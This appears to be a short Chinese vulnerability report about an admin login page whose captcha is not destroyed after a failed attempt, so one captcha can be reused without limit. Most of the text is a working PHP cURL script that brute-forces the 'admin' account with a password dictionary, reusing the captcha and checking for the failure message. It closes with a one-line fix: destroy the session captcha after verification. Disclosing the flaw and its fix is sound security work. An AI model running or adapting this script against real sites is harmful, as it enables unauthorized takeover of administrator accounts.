若验证码不匹配,并没有销毁当前验证码
所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用
1.获取正确的验证码
2.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | <?php $site = '' ; $admin_path = '/admin/privilege.php' ; $captcha = '上一步获取的验证码' ; $referer = $site ; function getH( $url , $postdata = array ()){ global $ch , $referer ; $options = array ( CURLOPT_URL => $url , CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true, CURLOPT_REFERER=> $referer , //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=> array ( 'Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1' , 'Expect:' ), CURLOPT_USERAGENT=> 'ie' ); if (! empty ( $postdata )){ $options [CURLOPT_POSTFIELDS]=http_build_query( $postdata ); } $ret = curl_setopt_array( $ch , $options ); //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//返回一个字符串,而不是直接输出到浏览器 $ret = curl_exec( $ch ); $info = curl_getinfo( $ch ); if ( empty ( $info [ 'http_code' ])) { die ( "No HTTP code was returned" ); } else if ( $info [ 'http_code' ]==200) { //响应码为200 return $ret ; } else { #var_dump( $info ); echo '<br />' ; echo ( '响应码:' . $info [ 'http_code' ]); // echo '<br />' ; echo $postdata [ 'username' ]. ' ---' . $postdata [ 'password' ]; echo '<br />' ; } } $url = $site . $admin_path ; $data = array ( 'username' => 'admin' , 'password' => '123456ad' , 'captcha' => $captcha , 'act' => 'signin' ); //词典 $passwds = array ( '1' , '2' , '3' , '123456a' , '123456' , '123456ds' ); foreach ( $passwds as $p ){ $data [ 'password' ]= $p ; $res = strip_tags (getH( $url , $data )); if ( stripos ( $res , '您输入的帐号信息不正确' )){ echo 'no' ; } echo '<br>------------------------<br>' ; } |
修复方案:
验证识别后销毁session中的验证码